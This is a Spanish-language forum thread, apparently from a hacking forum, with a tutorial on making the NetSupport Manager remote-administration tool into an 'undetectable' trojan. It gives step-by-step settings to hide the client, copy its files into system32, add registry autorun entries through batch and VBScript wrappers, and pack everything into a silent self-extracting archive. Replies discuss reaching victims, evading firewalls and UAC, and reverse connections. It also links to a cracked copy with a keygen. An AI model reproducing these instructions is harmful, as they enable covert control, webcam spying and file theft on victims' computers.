Hola a todos,en este tutorial boi a enseñar a "preperar" un troyano 100% INDETECTABLE,se trata de NetSupport...El mejor programa de administracion remota que existe actualmente.

Lo que haremos sera hacerlo "invisible" para que la victima cuando lo ejecute no se de cuenta y tambien añadiremos unos "copy" y unos "reg add" en batch para que la victima solo tenga que ejecutar el troyano una vez y despues nuestro batch lo ejecutara por la victima  .

Empecemos por descargarnos el software,lo podeis descargar desde la página oficial www.netsupport-inc.com aunke ai que registrarse i todo ese royo,lo podeis encontrar tambien por taringa (os e aorrado el trabajo en buscarlo )

Dscarga desde Megaupload (con keygen):
http://usuario-buscatelo-tumismo.com
Una vez descargado lo descomprimimos y lo instalamos en la carpeta por defecto.

Ahora vamos al directorio donde se instalo (por defecto C:\Program Files\NetSupport\NetSupport Manager),cuando acabeis de acer mariconadas con el controlador abrir el "pcicfgui.exe" click en "advanced" despues "master profile/edit" nos vamos a "client interface/client settings" y desmarcamos la casilla "icon in system tray" y marcamos la casilla "quiet mode" para ocultar el troyano,guardamos y cerramos.

Despues creamos una carpeta en el escritorio por ejemplo y metemos alli los archivos que nos aran falta para el troyano (client32.exe,client32.ini,nsm.lic,pcicapi.dll,pcichek.dll,pcicl32.dll,tcctl32.dll) copiamos y pegamos.

Lo siguiente es crear nuestros batch para que se inicie automaticamente cada vez que la victima encienda el pc,crearemos nuestro primer batch
[newbies]abrir bloc de notas escribir el codigo y darle a guardar con el formato "*.bat"[/newbies]


Este se encargara de ejecutar el troyano,lo guardaremos como "thumbs.bat",crearemos tambien un vbscript para que no se vea la ventana del shell y que no sea tan sospechoso
[newbies]abrir bloc de notas escribir el codigo y darle a guardar con el formato "*.vbs"[/newbies]


Lo guardaremos como "vbscript-thumbs.vbs".

Ahora crearemos el que tendra que ejecutar la victima,este se encarga de copiar todos los archivos a system32 y crear una entrada en el registro para que se autoinicie.


Lo llamaremos "start.bat" y tambien crearemos el vbscript


Guardarlo como "vbscript-start.vbs".

Ya tenemos casi todo echo,al ejecutar el "vbscript-start.vbs" se ejecutara el troyano y se copiara al registro,ahora comprimiremos todos los archivos con "sfx compiler" para que kede uno solo,lo podeis descargar desde http://sfx-compiler.uptodown.com/descargar/.

Ejecutamos sfx compiler y añadimos todos los archivos que tenemos en la carpeta,vamos a "options"
-file to run after extraction: ponemos "vbscript-start.vbs"
-file to run before extraction: <<none>>
-window tittle: lo dejamos en blanco
-custom text: en blanco
-default folder: en blanco
-include folders names in sfx: desmarcado
-display done message: desmarcado
-do not prompt user for folder selection: marcado
-ask user when over writing files: desmarcado
-(seleccionamos windows temp folder)
-ok button caption: en blanco
-cancel button caption: en blanco
-note: en blanco
-banner image: <<none>

Le damos a crear y le ponemos cualkier nombre y ya tendremos nuestro troyano acabado.

Crearemos tambien un desinfectador para borrar el troyano...

Creamos otro batch y le ponemos este codigo:


Lo guardamos como desinfectador.bat o lo que kerais vosotros y ya tenemos todo,espero que os aya gustado si copiais este tutorial para otro foro o lo que sea poner que es mio (ASSaulting).

Para dudas responder poniendo vuestra duda
Para critikas y demas comerme los ******* un saludo.

Funciones del troyano:

-Ver lo que esta haciendo la victima desde su monitor.
-Controlar el mouse de la victima.
-Controlar el teclado de la victima.
-Transferencia de archivos.
    -Descargar archivos.
    -Subir archivos.
    -Ejecutar archivos remotamente.
    -Renombrar archivos.
    -Eliminar archivos.
-Iniciar chat con la victima.
-Enviar un mensage a la victima.
-Apagar,reiniciar o cerrar sesion de la victima.
-Ver video y audio de camara web y altavoces.
-Comandos remotos.
-Y alguna cosa mas...

Novlucker ha ayudado ha mejorar el troyano,gracias 

Editado:Podeis escribir algunas mejoras para ayudar a todos o tambien si veis algun error,gracias 

Funciona correctamente si es lo que preguntas (;

hola me gustaria saber, cuando ya tengo todo hecho y demas, como hago con el netsupport para que el cliente se conecte? ahi es donde me pierdo porque supongo que el cliente tendria que conectar a mi pc, sin embargo no veo nada donde ponga que se debe de conectar a mi :S

aki el cliente es en lo que los troyanos tienes como server y el cliente es el controlador,asi que la victima tiene que ejecutar el cliente i tu controlas el cliente desde tu controlador,no se si me entiendes,si tienes mas dudas escribe 

Nuvlucker:
es verdad que se podrian acer cientoas de mejoras ya que no le e tomado mucho tiempo pero siempre podeis escribir nuevas mejoras o incorrecciones que tengan,

otro problemilla seria el router, no?
Creo que no tiene opcion de conexion inversa y el router nos daria problemitas.


Por lo del firewall de windows no creo que cante:
Soporte a la conectividad vía un componente HTTP Gateway, permitiendo asegurar las comunicaciones a través de internet sin necesidad de realizar cambios en el firewall local o en la red.


Porque las copias a system32?
Yo estoy algo traumado con win vista y no meto nada a system32 ni windows porque el UAC lo bloquea, es cierto q muchos no usan vista pero mas vale prevenir.
Podrias hacer q se guarde en la carpeta C y luego ponerla en hidden, no?
una recomendacion 

me pasa igualito a ti... hago todo pero luego llego al control para conectarme y no se por donde empezar

Hola de nuevo,antes de nada decir que es de conexion directa,lo de buscar clientes es por si esta infectado alguien que este usando tu misma conexion (un ciber por ejemplo usan todo sla misma red) otro ejemplo seria que tuvieses un hermano i usarais ordenadores distintos conextados por wifi,espero que lo alla explicado bien.

Segundo punto: puse system32 porke a esa carpeta no suele entrar la gente y si entra aver kien es el wapo que encuentra los archivos  (ya sabreis por que),podeis cambiar el directorio de todas formas...

Siguiente punto: Como que no encontrais el icono para conectaros??xD le dais a new/client y ai poneis el nombre que le kereis iamar a la victima le dais a siguiente y poneis la direccion ip de la victima despues finalizar i os conectais xD,si seguis sin encontrarlo escribiz i os pongo una foto o algo 

Otro punto: lo de agregar un firewall killer es opcional,el firewall de windows no canta porke es una ***** i weno i usan el de algun av weno pues talvez cante pero agregazlo vosotros si kereis.

Ultimo punto: Si,si que se puede copiar a C:\ y ponerlo oculto pero puede que la victima tenga puesto ver archivos ocultos.

Un saludo 

Bueno, probando un poco este soft veo que como ha dicho MITM se lo puede "enchular" para que quede mejor, y más allá de algunos cambios que personalmente le realizaría, como ser ocultarlo en otra carpeta y el link en la carpeta Inicio, en un rato de "inspiración" he podido apañar esto ...


Ya tengo uno de conexión inversa , pero lo que no me convence es que hay que agregarle varios Mb más, con lo que el SFX resultante pasa de unos 900 kb (que ya no es poco) a unos 3 Mb, así que no creo que valga la pena

Saludos

Nota: hay que tener en cuenta de que el instalador original de este soft pesa unos 32 Mb